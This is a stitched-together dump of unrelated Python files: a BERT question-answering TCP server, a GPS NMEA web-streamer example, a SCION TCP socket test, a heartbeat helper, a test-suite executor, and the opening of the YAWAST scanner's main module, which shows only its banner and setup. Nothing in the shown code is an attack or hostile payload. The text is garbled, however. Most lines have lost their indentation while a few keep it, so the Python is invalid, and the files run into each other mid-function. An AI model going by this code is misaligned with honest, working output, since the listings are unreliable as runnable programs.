if c == " " or c == "\t" or c == "\r" or c == "\n" or ord(c) == 0x202F:
return True
return False
eval_examples = []
temp_list = []
for i, DOCID in enumerate(DOC2IDX) :
temp_list.append(DOCID)
for question in questions:
#-------------------------questions - Start---------------------------#
question_text = question
start_position = -1
end_position = -1
orig_answer_text = ""
is_impossible = False
#-------------documents - Start--------------#
        for i, paragraph_text in enumerate(documents):
            # `documents` is the module-level list populated in main()
#-------paragraphs - Start-------#
doc_tokens = []
char_to_word_offset = []
prev_is_whitespace = True
for c in paragraph_text:
if is_whitespace(c):
prev_is_whitespace = True
else:
if prev_is_whitespace:
doc_tokens.append(c)
else:
doc_tokens[-1] += c
prev_is_whitespace = False
char_to_word_offset.append(len(doc_tokens) - 1)
#-------paragraphs - End-------#
qas_id = str(uuid.uuid1())
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_id = temp_list[i],
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
eval_examples.append(example)
#-------------documents - Start--------------#
#-------------------------questions - End-----------------------------#
if example_in_set_eval_examples == 1:
print('len of eval_examples:%d' %len(eval_examples))
for i, example in enumerate(eval_examples):
print(i)
print (example.question_text)
'''
for i, example in enumerate(eval_examples):
print('idx:%d:%s' %(i,example.question_text))
'''
return eval_examples
from socket import *
import sys
import threading
import time
from time import localtime
import imp
BUFSIZ = 4096
if sys.version[0] == '2':
imp.reload(sys)
sys.setdefaultencoding("utf-8")
class TcpServer():
def __init__(self,tokenizer,estimator,DOC2IDX):
self.HOST = FLAGS.Host_TCPServer
self.PORT = FLAGS.PORT_TCPServer
self.tokenizer = tokenizer
self.estimator = estimator
self.ADDR = (self.HOST,self.PORT)
self.DOC2IDX = DOC2IDX
self.STOP_CHAT = False
self.STOP_listen = False
self.predict_input_fn = None
try:
self.sock = socket(AF_INET, SOCK_STREAM)
print('%d is open' %self.PORT)
self.sock.bind(self.ADDR)
self.sock.listen(5)
            # exit-condition flags (STOP_CHAT / STOP_listen) are set above
            # all connected client sockets and their threads
self.clients = {}
self.thrs = {}
self.stops = []
print("before init predict_input_fn")
export_dir = FLAGS.EXPORT_PATH
subdirs = [x for x in Path(export_dir).iterdir()
if x.is_dir() and 'temp' not in str(x)]
print(subdirs)
latest = str(sorted(subdirs)[-1])
print("init predict_input_fn step1")
self.predict_input_fn = tf.contrib.predictor.from_saved_model(latest)
print("init predict_input_fn finish")
#self.predict_input_fn = tf.contrib.predictor.from_saved_model(FLAGS.EXPORT_PATH)
except Exception as e:
print("%d has some init error" %self.PORT)
return None
def listen_client(self):
while not self.STOP_CHAT:
            print(u'Waiting for connection, listening on port: %d' % self.PORT)
self.tcpClientSock, self.addr = self.sock.accept()
            print(u'Connection accepted, client address:', self.addr)
while len(self.stops)!=0:
address_stop = self.stops.pop()
self.thrs[address_stop].join()
address = self.addr
            # store the established client socket in self.clients
self.clients[address] = self.tcpClientSock
            # handle each connection in its own thread, receiving and dispatching messages
self.thrs[address] = threading.Thread(target=self.readmsg, args=[address])
self.thrs[address].start()
time.sleep(0.5)
#self.tcpClientSock.send(b'you are connect...')
self.close_all()
        print(u'Server shutting down')
def readmsg(self, address):
        # return False if the address is not a known client
if address not in self.clients:
return False
        # get the client socket for this address
client = self.clients[address]
while True:
try:
                # receive the message payload
data = client.recv(BUFSIZ)
            except Exception as err:
                print(err)
self.close_client(address)
break
try:
temp = data.decode('utf8')
except:
print('data is not utf8 :%s' %(str(data)) )
self.close_client(address)
break
                # Python 3 sockets deliver bytes, so the payload has to be decoded
                # s = '%s sent me: [%s] %s' % (addr[0], ctime(), data.decode('utf8'))
                # format the timestamp
ISOTIMEFORMAT = '%Y-%m-%d %X'
stime = time.strftime(ISOTIMEFORMAT, localtime())
print([address], '@',[stime],':', data.decode('utf8'))
if len(data)<3:
if self.STOP_CHAT:
break
print('data is not reasonable:')
print(data)
self.close_client(address)
break
else:
self.STOP_CHAT = (data.decode('utf8').upper() == "QUIT")
if self.STOP_CHAT:
print("quit")
self.close_client(address)
print("already quit")
break
elif data.decode('utf8') == Disconnect_KEYWORD:
print("disconnect")
self.close_client(address)
break
#tokenizer = self.tokenizer
#estimator = self.estimator
#DOC2IDX = self.DOC2IDX
question = data.decode('utf8')
#print('My question:',question)
if FLAGS.do_predict:
# define
#---------------------------------------------------
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
# ---------------------------------------------------
# print('WillyTest(1)...do Set question:%s' %(FLAGS.question_type))
# ---------------------set question , changed by willy---------------------#
questions = list()
questions.append(question)
#print('My questions:')
#print(questions)
#-------------------------------------------------------------------------#
#print('WillyTest(2)...do Set eval_examples')
eval_examples=set_eval_examples(questions,self.DOC2IDX)
                    #print('WillyTest(2.1)...done set_eval_examples')
eval_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir, "eval.tf_record"),
is_training=False
)
#print('WillyTest(2.2)...do convert_examples_to_features')
convert_examples_to_features(
examples=eval_examples,
tokenizer=self.tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature
)
eval_writer.close()
tf.compat.v1.logging.info("***** Running predictions *****")
tf.compat.v1.logging.info(" Num orig examples = %d", len(eval_examples))
tf.compat.v1.logging.info(" Num split examples = %d", len(eval_features))
tf.compat.v1.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
print('WillyTest(5)...before redict_input_fn = input_fn_builder: eval_writer.filename=%s, FLAGS.max_seq_length=%d' %(eval_writer.filename,FLAGS.max_seq_length))
                    # Build a serialized tf.train.Example from the first converted feature and
                    # run it through the exported SavedModel predictor (this mirrors the
                    # commented-out variant further below).
                    first_feature = eval_features[0]
                    inputs = collections.OrderedDict()
                    inputs["input_ids"] = create_int_feature(first_feature.input_ids)
                    inputs["input_mask"] = create_int_feature(first_feature.input_mask)
                    inputs["segment_ids"] = create_int_feature(first_feature.segment_ids)
                    inputs["unique_ids"] = create_int_feature([first_feature.unique_id])
                    tf_example = tf.train.Example(features=tf.train.Features(feature=inputs))
                    print("Before do predict")
                    out = self.predict_input_fn({'examples': [tf_example.SerializeToString()]})
print("Finish do predict")
#out = self.predict_input_fn({'examples':[str(feature_spec)]})
'''
def create_int_feature(values):
f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))
return f
features = eval_features
inputs = collections.OrderedDict()
inputs["input_ids"] = create_int_feature(features[0].input_ids)
inputs["input_mask"] = create_int_feature(features[0].input_mask)
inputs["segment_ids"] = create_int_feature(features[0].segment_ids)
inputs["unique_ids"] = create_int_feature([features[0].unique_id])
tf_example = tf.train.Example(features=tf.train.Features(feature=inputs))
out = self.predict_input_fn({'examples':[tf_example.SerializeToString()]})
print('Output Data:')
print(out)
'''
'''
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False
)
all_results = []
print('WillyTest(6)...before estimator predict')
for result in self.estimator.predict(predict_input_fn, yield_single_examples=True):
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(RawResult(unique_id=unique_id,start_logits=start_logits,end_logits=end_logits))
print('WillyTest(8)...before write_predictions')
list_ans,list_text = write_predictions(
eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case
)
temp_answer = ''
if len(list_ans)==1 and len(list_text)==1:
temp_answer = 'Dr_Answer' + list_ans[0] + 'Dr_QA' + list_text[0] + '<AtenEnd>'
client.send(temp_answer.encode('utf8'))
else:
print("Willy warning: write_predictions is not valid....")
print('list_ans')
print(list_ans)
print('list_text')
print(list_text)
#clear list
eval_features.clear()
eval_examples.clear()
all_results.clear()
questions.clear()
'''
def close_all(self):
try:
keys=self.clients.keys()
for address in keys:
client = self.clients.pop(address)
client.close()
time.sleep(1)
thr = self.thrs[address].pop()
thr.join()
except:
            print(u'exception while closing clients')
pass
        print(u'all clients have exited')
def close_client(self, address):
try:
client = self.clients.pop(address)
self.stops.append(address)
print(u'try close client')
client.close()
            print(u'try close recv thread')
#thr = self.thrs[address].pop()
#thr.join()
'''
for k in self.clients:
print(u'try leave')
print(u'try client1:', [self.clients[k]])
print(u'try client2:', [self.clients[address]])
print(u'try client3:', [k])
print(u'try client4:', [address])
client = self.clients.pop(k)
#print(u'try leave1')
#self.stops.append(k)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
except:
            print(u'exception while closing client')
pass
        print(str(address) + u' has exited')
def main(_):
global ranker
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
print(willy_check_code)
print('Bert config: %s' %(FLAGS.bert_config_file))
#FLAGS.bert_config_file = 'gs://bert_willytest/bert/models/20190910-wwm-cased-40QA-SQuAD2-AtenDocQA-withoutYesNo-max_seq_length-256-doc_stride-128-learning_rate-3e-5/bert_config.json'
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.io.gfile.makedirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
print('Init checkpoint: %s' %FLAGS.init_checkpoint )
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
if FLAGS.do_retriever:
# Set Document
# ------------------------------------------------------
print('WillyTest...do SQlite')
DOC2IDX, docments = read_sqlite_documents(input_file=FLAGS.db_file)
# ------------------------------------------------------
else:
# Set Document
tf.compat.v1.logging.info("my document_type is %s", FLAGS.document_type)
    if FLAGS.document_type == 'Text':
# TODO
print('WillyTest...do Text')
docments = read_text_documents(input_file=FLAGS.predict_file)
    elif FLAGS.document_type == 'SQuAD':
# TODO
print('WillyTest...do SQuAD')
docments = read_squad_documents(input_file=FLAGS.predict_file)
# else:
# #raise ValueError("Your document_type: %s is undefined or wrong, please reset it." %(FLAGS.document_type))
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
if FLAGS.Save_PB_Model:
estimator._export_to_tpu = False ## !!important to add this
estimator.export_saved_model(
export_dir_base = FLAGS.EXPORT_PATH,
serving_input_receiver_fn = serving_input_receiver_fn)
else:
print("do tcp server")
ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
tserver = None
tserver = TcpServer(tokenizer,estimator,DOC2IDX)
while tserver is None:
tserver = TcpServer( tokenizer,estimator,DOC2IDX)
print("do tcp server-listen")
tserver.listen_client()
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.compat.v1.app.run()
|
gpsstreamer.py
|
"""
This illustrates a simple HTTP wrapper around the
pynmneagps NMEAStreamer streaming and parsing example.
It displays selected GPS data on a dynamically updated web page
using the native Python 3 http.server library and a RESTful API
implemented by the pynmeagps streaming and parsing service.
NB: Must be executed from the root folder i.e. /examples/webserver/.
Press CTRL-C to terminate.
The web page can be accessed at http://localhost:8080. The parsed
data can also be accessed directly via the REST API http://localhost:8080/gps.
Created on 17 May 2021
:author: semuadmin
:license: (c) SEMU Consulting 2021 - BSD 3-Clause License
"""
from io import BufferedReader
from threading import Thread
from time import sleep
import json
from gpshttpserver import GPSHTTPServer, GPSHTTPHandler
from serial import Serial, SerialException, SerialTimeoutException
from pynmeagps import NMEAReader, GET
import pynmeagps.exceptions as nme
class NMEAStreamer:
"""
NMEAStreamer class.
"""
def __init__(self, port, baudrate, timeout=0.1, nmea_only=0, validate=1):
"""
Constructor.
"""
self._serial_object = None
self._serial_thread = None
self._nmeareader = None
self._connected = False
self._reading = False
self._port = port
self._baudrate = baudrate
self._timeout = timeout
self._nmea_only = nmea_only
self._validate = validate
self.gpsdata = {
"date": "1900-01-01",
"time": "00.00.00",
"latitude": 0.0,
"longitude": 0.0,
"elevation": 0.0,
"speed": 0.0,
"track": 0.0,
"siv": 0,
"pdop": 99,
"hdop": 99,
"vdop": 99,
"fix": 0,
}
def __del__(self):
"""
Destructor.
"""
self.stop_read_thread()
self.disconnect()
def connect(self):
"""
Open serial connection.
"""
self._connected = False
try:
print(f"Connecting to serial port {self._port} at {self._baudrate} baud...")
self._serial_object = Serial(
self._port, self._baudrate, timeout=self._timeout
)
self._nmeareader = NMEAReader(
BufferedReader(self._serial_object),
nmeaonly=self._nmea_only,
validate=self._validate,
msgmode=GET,
)
self._connected = True
except (SerialException, SerialTimeoutException) as err:
print(f"Error connecting to serial port {err}")
return self._connected
def disconnect(self):
"""
Close serial connection.
"""
if self._connected and self._serial_object:
print("Disconnecting from serial port...")
try:
self._serial_object.close()
except (SerialException, SerialTimeoutException) as err:
print(f"Error disconnecting from serial port {err}")
self._connected = False
return self._connected
def start_read_thread(self):
"""
Start the serial reader thread.
"""
if self._connected:
print("\nStarting reader thread...")
self._reading = True
self._serial_thread = Thread(target=self._read_thread, daemon=True)
self._serial_thread.start()
def stop_read_thread(self):
"""
Stop the serial reader thread.
"""
if self._serial_thread is not None:
print("\nStopping web server thread...")
self._reading = False
def _read_thread(self):
"""
THREADED PROCESS
Reads and parses NMEA message data from stream
"""
while self._reading and self._serial_object:
if self._serial_object.in_waiting:
try:
(raw_data, parsed_data) = self._nmeareader.read()
if parsed_data:
self.set_data(parsed_data)
except (
nme.NMEAStreamError,
nme.NMEAMessageError,
nme.NMEATypeError,
nme.NMEAParseError,
) as err:
print(f"Something went wrong {err}")
continue
def set_data(self, parsed_data):
"""
Set GPS data dictionary from RMC, GGA and GSA sentences.
"""
print(parsed_data)
if parsed_data.msgID == "RMC":
self.gpsdata["date"] = str(parsed_data.date)
self.gpsdata["time"] = str(parsed_data.time)
self.gpsdata["latitude"] = parsed_data.lat
self.gpsdata["longitude"] = parsed_data.lon
self.gpsdata["speed"] = parsed_data.spd
self.gpsdata["track"] = parsed_data.cog
if parsed_data.msgID == "GGA":
self.gpsdata["time"] = str(parsed_data.time)
self.gpsdata["latitude"] = parsed_data.lat
self.gpsdata["longitude"] = parsed_data.lon
self.gpsdata["elevation"] = parsed_data.alt
self.gpsdata["siv"] = parsed_data.numSV
self.gpsdata["hdop"] = parsed_data.HDOP
if parsed_data.msgID == "GSA":
self.gpsdata["fix"] = parsed_data.navMode
self.gpsdata["pdop"] = parsed_data.PDOP
self.gpsdata["hdop"] = parsed_data.HDOP
self.gpsdata["vdop"] = parsed_data.VDOP
def get_data(self):
"""
Return GPS data in JSON format.
This is used by the REST API /gps implemented in the
GPSHTTPServer class.
"""
return json.dumps(self.gpsdata)
if __name__ == "__main__":
ADDRESS = "localhost"
TCPPORT = 8080
# Edit these for your serial GPS device:
SERIALPORT = "/dev/tty.usbmodem141101" # "/dev/ttyACM1"
BAUD = 38400
gps = NMEAStreamer(SERIALPORT, BAUD)
httpd = GPSHTTPServer((ADDRESS, TCPPORT), GPSHTTPHandler, gps)
if gps.connect():
gps.start_read_thread()
print(
"\nStarting HTTP Server on http://"
+ ADDRESS
+ ":"
+ str(TCPPORT)
+ " ...\n"
)
httpd_thread = Thread(target=httpd.serve_forever, daemon=True)
httpd_thread.start()
try:
while True:
sleep(1)  # idle the main thread; the reader and HTTP server threads do the work
except KeyboardInterrupt:
print("\n\nInterrupted by user\n\n")
httpd.shutdown()
gps.stop_read_thread()
sleep(2) # wait for shutdown
gps.disconnect()
print("\nTest Complete")
|
tcp_test.py
|
#!/usr/bin/python3
# Copyright 2016 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`tcp_test` --- Dummy TCP Client/Server test.
=================================================
"""
# TODO(PSz): drop this test when TCP is integrated within the end2end test.
# Stdlib
import random
import struct
import threading
import time
# SCION
from lib.packet.host_addr import haddr_parse
from lib.packet.scion_addr import ISD_AS, SCIONAddr
from lib.packet.svc import SVCType
from lib.tcp.socket import SCIONTCPSocket, SockOpt
from lib.util import recv_all
from test.integration.base_cli_srv import start_sciond
s_isd_as = ISD_AS("1-18")
s_ip = haddr_parse(1, "127.1.1.1")
c_isd_as = ISD_AS("2-26")
c_ip = haddr_parse(1, "127.2.2.2")
# TODO(PSz): test with 0
MAX_MSG_SIZE = 500000
def get_msg():
size = random.randint(1, MAX_MSG_SIZE)
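# Frame the payload with a 4-byte big-endian length prefix; the client first
# reads these 4 bytes (via recv_all) to learn how many payload bytes follow.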
return struct.pack("!I", size) + b"A"*size
def server(svc=False):
print("server running")
s = SCIONTCPSocket()
print('setsockopt')
s.setsockopt(SockOpt.SOF_REUSEADDR)
print(s.getsockopt(SockOpt.SOF_REUSEADDR))
addr = SCIONAddr.from_values(s_isd_as, s_ip)
if svc:
s.bind((addr, 6000), svc=SVCType.PS_A)
else:
s.bind((addr, 5000))
s.listen()
while True:
new_sock, addr, path = s.accept()
print("Accepted: addr and path:", addr, path)
msg = get_msg()
# time.sleep(10)
new_sock.send(msg)
new_sock.close()
def client(svc, counter):
def get_path_info(myaddr, dst_isd_as):
sd = start_sciond(myaddr)
path = sd.get_paths(dst_isd_as)[0]
if_id = path.get_fwd_if()
return (path, sd.ifid2br[if_id].addr, sd.ifid2br[if_id].port)
print("client %d running:" % counter)
s = SCIONTCPSocket()
caddr = SCIONAddr.from_values(c_isd_as, c_ip)
s.bind((caddr, 0))
path_info = get_path_info(caddr, s_isd_as)
print(path_info)
if svc:
saddr = SCIONAddr.from_values(s_isd_as, SVCType.PS_A)
s.connect(saddr, 0, *path_info) # SVC does not have a port specified
else:
saddr = SCIONAddr.from_values(s_isd_as, s_ip)
s.connect(saddr, 5000, *path_info)
# s.set_recv_tout(5.0)
# print(s.get_recv_tout())
start = time.time()
size = struct.unpack("!I", recv_all(s, 4, 0))[0]
tmp = b''
print("To receive: %dB" % size)
while len(tmp) != size:
tmp += s.recv(1024)
print('.', end="", flush=True)
print("\nMSG received, len, svc", len(tmp), svc)
time_elapsed = time.time()-start
print("Time elapsed: %s, speed %.2fkB/s\n" % (time_elapsed,
size/time_elapsed/1000))
s.close()
threading.Thread(target=server, args=[False]).start()
threading.Thread(target=server, args=[True]).start()
time.sleep(0.5)
for i in range(10):
# input()
# time.sleep(0.005)
# threading.Thread(target=client, args=[False, i]).start()
svc = (i % 2 == 0)
start = time.time()
client(svc, i)
|
heartbeat.py
|
import asyncio
import time
import threading
class HeartBeat:
def __init__(self, rust_api) -> None:
self.rust_api = rust_api
self.next_run = time.time()
self.running = False
async def start_beat(self) -> None:
if self.running:
return
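# Schedule the heart_beat coroutine onto the caller's event loop from a
# short-lived daemon thread, so start_beat returns without blocking on it.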
def wrapper(self, loop) -> None:
async def heart_beat(self) -> None:
while True:
if time.time() >= self.next_run:
await self.beat()
else:
await asyncio.sleep(1)
asyncio.run_coroutine_threadsafe(heart_beat(self), loop)
thread = threading.Thread(target=wrapper, args=[self, asyncio.get_event_loop()])
thread.daemon = True
thread.start()
self.running = True
async def beat(self) -> None:
if self.rust_api.remote.ws is not None:
await self.rust_api._send_wakeup_request()
def reset_rythm(self) -> None:
self.next_run = time.time() + 300
|
executor.py
|
"""Driver of the test execution framework."""
from __future__ import absolute_import
import threading
import time
from . import fixtures
from . import hook_test_archival as archival
from . import hooks as _hooks
from . import job as _job
from . import report as _report
from . import testcases
from .. import config as _config
from .. import errors
from .. import utils
from ..core import network
from ..utils import queue as _queue
class TestSuiteExecutor(object): # pylint: disable=too-many-instance-attributes
"""Execute a test suite.
Responsible for setting up and tearing down the fixtures that the
tests execute against.
"""
_TIMEOUT = 24 * 60 * 60 # =1 day (a long time to have tests run)
def __init__( # pylint: disable=too-many-arguments
self, exec_logger, suite, config=None, fixture=None, hooks=None, archive_instance=None,
archive=None):
"""Initialize the TestSuiteExecutor with the test suite to run."""
self.logger = exec_logger
if _config.SHELL_CONN_STRING is not None:
# Specifying the shellConnString command line option should override the fixture
# specified in the YAML configuration to be the external fixture.
self.fixture_config = {
"class": fixtures.EXTERNAL_FIXTURE_CLASS,
"shell_conn_string": _config.SHELL_CONN_STRING
}
else:
self.fixture_config = fixture
self.hooks_config = utils.default_if_none(hooks, [])
self.test_config = utils.default_if_none(config, {})
self.archival = None
if archive_instance:
self.archival = archival.HookTestArchival(suite, self.hooks_config, archive_instance,
archive)
self._suite = suite
self.test_queue_logger = self.logger.new_testqueue_logger(suite.test_kind)
# Only start as many jobs as we need. Note this means that the number of jobs we run may
# not actually be _config.JOBS or self._suite.options.num_jobs.
jobs_to_start = self._suite.options.num_jobs
self.num_tests = len(suite.tests) * self._suite.options.num_repeat_tests
if self.num_tests < jobs_to_start:
self.logger.info(
"Reducing the number of jobs from %d to %d since there are only %d test(s) to run.",
self._suite.options.num_jobs, self.num_tests, self.num_tests)
jobs_to_start = self.num_tests
# Must be done after getting buildlogger configuration.
self._jobs = [self._make_job(job_num) for job_num in xrange(jobs_to_start)]
def run(self):
"""Execute the test suite.
Any exceptions that occur during setting up or tearing down a
fixture are propagated.
"""
self.logger.info("Starting execution of %ss...", self._suite.test_kind)
return_code = 0
# The first run of the job will set up the fixture.
setup_flag = threading.Event()
# We reset the internal state of the PortAllocator so that ports used by the fixture during
# a test suite run earlier can be reused during this current test suite.
network.PortAllocator.reset()
teardown_flag = None
try:
num_repeat_suites = self._suite.options.num_repeat_suites
while num_repeat_suites > 0:
test_queue = self._make_test_queue()
partial_reports = [job.report for job in self._jobs]
self._suite.record_test_start(partial_reports)
# Have the Job threads destroy their fixture during the final repetition after they
# finish running their last test. This avoids having a large number of processes
# still running if an Evergreen task were to time out from a hang/deadlock being
# triggered.
teardown_flag = threading.Event() if num_repeat_suites == 1 else None
(report, interrupted) = self._run_tests(test_queue, setup_flag, teardown_flag)
self._suite.record_test_end(report)
if setup_flag and setup_flag.is_set():
self.logger.error("Setup of one of the job fixtures failed")
return_code = 2
return
# Remove the setup flag once the first suite ran.
setup_flag = None
# If the user triggered a KeyboardInterrupt, then we should stop.
if interrupted:
raise errors.UserInterrupt("Received interrupt from user")
if teardown_flag and teardown_flag.is_set():
return_code = 2
sb = [] # String builder.
self._suite.summarize_latest(sb)
self.logger.info("Summary: %s", "\n ".join(sb))
if not report.wasSuccessful():
return_code = 1
if self._suite.options.fail_fast:
break
test_report = report.as_dict()
test_results_num = len(test_report["results"])
# There should be at least as many tests results as expected number of tests.
if test_results_num < self.num_tests:
raise errors.ResmokeError("{} reported tests is less than {} expected tests"
.format(test_results_num, self.num_tests))
# Clear the report so it can be reused for the next execution.
for job in self._jobs:
job.report.reset()
num_repeat_suites -= 1
finally:
if not teardown_flag:
if not self._teardown_fixtures():
return_code = 2
self._suite.return_code = return_code
def _run_tests(self, test_queue, setup_flag, teardown_flag):
"""Start a thread for each Job instance and block until all of the tests are run.
Returns a (combined report, user interrupted) pair, where the
report contains the status and timing information of tests run
by all of the threads.
"""
threads = []
interrupt_flag = threading.Event()
user_interrupted = False
try:
# Run each Job instance in its own thread.
for job in self._jobs:
thr = threading.Thread(target=job, args=(test_queue, interrupt_flag), kwargs=dict(
setup_flag=setup_flag, teardown_flag=teardown_flag))
# Do not wait for tests to finish executing if interrupted by the user.
thr.daemon = True
thr.start()
threads.append(thr)
# SERVER-24729 Need to stagger when jobs start to reduce I/O load if there
# are many of them. Both the 5 and the 10 are arbitrary.
# Currently only enabled on Evergreen.
if _config.STAGGER_JOBS and len(threads) >= 5:
time.sleep(10)
joined = False
while not joined:
# Need to pass a timeout to join() so that KeyboardInterrupt exceptions
# are propagated.
joined = test_queue.join(TestSuiteExecutor._TIMEOUT)
except (KeyboardInterrupt, SystemExit):
interrupt_flag.set()
user_interrupted = True
else:
# Only wait for all the Job instances if not interrupted by the user.
for thr in threads:
thr.join()
reports = [job.report for job in self._jobs]
combined_report = _report.TestReport.combine(*reports)
# We cannot return 'interrupt_flag.is_set()' because the interrupt flag can be set by a Job
# instance if a test fails and it decides to drain the queue. We only want to raise a
# StopExecution exception in TestSuiteExecutor.run() if the user triggered the interrupt.
return (combined_report, user_interrupted)
def _teardown_fixtures(self):
"""Tear down all of the fixtures.
Returns true if all fixtures were torn down successfully, and
false otherwise.
"""
success = True
for job in self._jobs:
if not job.teardown_fixture():
self.logger.warning("Teardown of %s of job %s was not successful", job.fixture,
job.job_num)
success = False
return success
def _make_fixture(self, job_num, job_logger):
"""Create a fixture for a job."""
fixture_config = {}
fixture_class = fixtures.NOOP_FIXTURE_CLASS
if self.fixture_config is not None:
fixture_config = self.fixture_config.copy()
fixture_class = fixture_config.pop("class")
fixture_logger = job_logger.new_fixture_logger(fixture_class)
return fixtures.make_fixture(fixture_class, fixture_logger, job_num, **fixture_config)
def _make_hooks(self, fixture):
"""Create the hooks for the job's fixture."""
hooks = []
for hook_config in self.hooks_config:
hook_config = hook_config.copy()
hook_class = hook_config.pop("class")
hook_logger = self.logger.new_hook_logger(hook_class, fixture.logger)
hook = _hooks.make_hook(hook_class, hook_logger, fixture, **hook_config)
hooks.append(hook)
return hooks
def _make_job(self, job_num):
"""Return a Job instance with its own fixture, hooks, and test report."""
job_logger = self.logger.new_job_logger(self._suite.test_kind, job_num)
fixture = self._make_fixture(job_num, job_logger)
hooks = self._make_hooks(fixture)
report = _report.TestReport(job_logger, self._suite.options)
return _job.Job(job_num, job_logger, fixture, hooks, report, self.archival,
self._suite.options, self.test_queue_logger)
def _make_test_queue(self):
"""Return a queue of TestCase instances.
Use a multi-consumer queue instead of a unittest.TestSuite so
that the test cases can be dispatched to multiple threads.
"""
# Put all the test cases in a queue.
queue = _queue.Queue()
for _ in range(self._suite.options.num_repeat_tests):
for test_name in self._suite.tests:
test_case = testcases.make_test_case(self._suite.test_kind, self.test_queue_logger,
test_name, **self.test_config)
queue.put(test_case)
# Add sentinel value for each job to indicate when there are no more items to process.
for _ in xrange(len(self._jobs)):
queue.put(None)
return queue
|
main.py
|
import locale
import platform
import signal
import ssl
import sys
import threading
import time
from datetime import datetime
from multiprocessing import current_process, active_children
from typing import cast
import psutil
from colorama import Fore
from packaging import version
from psutil import Process
from yawast import command_line
from yawast._version import get_version
from yawast.external.get_char import getchar
from yawast.external.memory_size import Size
from yawast.external.spinner import Spinner
from yawast.reporting import reporter
from yawast.shared import output, network
_start_time = datetime.now()
_monitor = None
_has_shutdown = False
def main():
global _start_time, _monitor
signal.signal(signal.SIGINT, signal_handler)
parser = command_line.build_parser()
args, urls = parser.parse_known_args()
# setup the output system
output.setup(args.debug, args.nocolors)
output.debug("Starting application...")
network.init(args.proxy, args.cookie)
# if we made it this far, it means that the parsing worked.
urls = command_line.process_urls(urls)
# we are good to keep going
print_header()
if args.output is not None:
reporter.init(args.output)
_set_basic_info()
print(f"Saving output to '{reporter.get_output_file()}'")
print()
try:
with _KeyMonitor():
with _ProcessMonitor() as pm:
_monitor = pm
args.func(args, urls)
except KeyboardInterrupt:
output.empty()
output.error("Scan cancelled by user.")
finally:
_shutdown()
def print_header():
start_time = time.strftime("%Y-%m-%d %H:%M:%S %Z (%z)", time.localtime())
vm = psutil.virtual_memory()
mem_total = "{0:cM}".format(Size(vm.total))
mem_avail = "{0:cM}".format(Size(vm.available))
cpu_freq = psutil.cpu_freq()
cpu_max = int(cpu_freq.max)
if cpu_max == 0:
# in this case, we don't have a real max, so go with current
cpu_max = int(cpu_freq.current)
print(r" .-. .- ")
print(r" \ \ / / _ ")
print(r" \ \ / / | | ")
print(r" \ \ / / __ ___ ____ _ ___| |_ ")
print(r" \ \ / / / _` \ \ /\ / / _` / __| __|")
print(r" \ ` / | (_| |\ V V / (_| \__ \ |_ ")
print(r" \ / \__,_| \_/\_/ \__,_|___/\__|")
print(r" / / ")
print(r" |`-' / ...where a pentest starts ")
print(r" '..' ")
print()
print(f"The YAWAST Antecedent Web Application Security Toolkit (v{get_version()})")
print(" Copyright (c) 2013-2019 Adam Caudill <adam@adamcaudill.com>")
print(" Support & Documentation: https://github.com/adamcaudill/yawast")
print(
f" Python {''.join(sys.version.splitlines())} ({platform.python_implementation()})"
)
print(f" {ssl.OPENSSL_VERSION}")
print(f" Platform: {platform.platform()} ({_get_locale()})")
print(
